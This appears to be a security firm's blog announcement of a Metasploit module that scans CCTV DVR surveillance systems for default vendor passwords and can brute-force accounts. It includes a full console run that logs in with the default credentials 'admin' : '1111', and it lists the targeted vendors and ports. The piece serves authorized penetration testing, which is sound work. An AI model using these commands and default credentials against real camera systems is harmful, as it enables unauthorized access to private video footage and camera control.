A
new module for the Metasploit Framework, CCTV DVR Login Scanning Utility*, discovers and tests the security
of standalone CCTV (Closed Circuit Television) video surveillance systems. Such
systems are frequently deployed in retail stores, living communities, personal
residences, and business environments as part of their physical security
program. However, many of these systems are vulnerable to exploitation that can
allow attackers remote access. Such remote access, enabled by default, can
allow not only the ability to view real-time video, but control of the cameras
(if supported), and provide access to archived footage.
Most
owners of CCTV video surveillance systems may not even be fully aware of the
device's remote access capabilities as monitoring may be conducted exclusively
via the local video console. This further increases the likelihood of attackers
gaining/persisting remote access, with no indication to the owner that their
video surveillance system and archived footage may be accessed remotely.
Here
at Gotham Digital Science, we
often encounter video surveillance systems during penetration testing
engagements – some of which may be exposed to the Internet, either
intentionally or by accident. With any video surveillance system it is often
interesting (and sometimes very important) to find out exactly what cameras are
monitoring/recording within the environment. Furthermore, access to such
systems can often be utilized to support physical security testing initiatives.
This
module targets standalone CCTV video surveillance systems by MicroDigital,
HIKVISION, CTRing, and a substantial number of other rebranded devices.
msf > use auxiliary/scanner/misc/cctv_dvr_loginmsf auxiliary(cctv_dvr_login) > set RHOSTS 10.10.1.14RHOSTS => 10.10.1.14msf auxiliary(cctv_dvr_login) > exploit
[*] 10.10.1.14:5920 CCTV_DVR - [001/133] - Trying username:'admin' with password:''
[-] 10.10.1.14:5920 CCTV_DVR - [001/133] - Failed login as: 'admin'
[*] 10.10.1.14:5920 CCTV_DVR - [002/133] - Trying username:'user' with password:''
[-] 10.10.1.14:5920 CCTV_DVR - [002/133] - Invalid user: 'user'
[*] 10.10.1.14:5920 CCTV_DVR - [003/133] - Trying username:'admin' with password:'admin'
[-] 10.10.1.14:5920 CCTV_DVR - [003/133] - Failed login as: 'admin'
[*] 10.10.1.14:5920 CCTV_DVR - [004/133] - Trying username:'admin' with password:'1111'
[+] 10.10.1.14:5920 Successful login: 'admin' : '1111'
[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1): http://10.10.1.14:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
*CCTV DVR Login
Scanning Utility:
This module tests for
standalone CCTV DVR video surveillance deployments specifically by
MicroDigital, HIKVISION, CTRing, and numerous other rebranded devices that are
utilizing default vendor passwords. Additionally, this module has the ability
to brute force user accounts. Such CCTV DVR video surveillance deployments
support remote viewing through Central Management Software (CMS) via the CMS
Web Client, an IE ActiveX control hosted over HTTP, or through Win32 or mobile
CMS client software. By default, remote authentication is handled over port
5920/TCP with video streaming over 5921/TCP. After successful authentication
over 5920/TCP this module will then attempt to determine if the IE ActiveX
control is listening on the default HTTP port (80/TCP).
Module
Name : auxiliary/scanner/misc/cctv_dvr_login
Authors:
Mr. Justin Cacak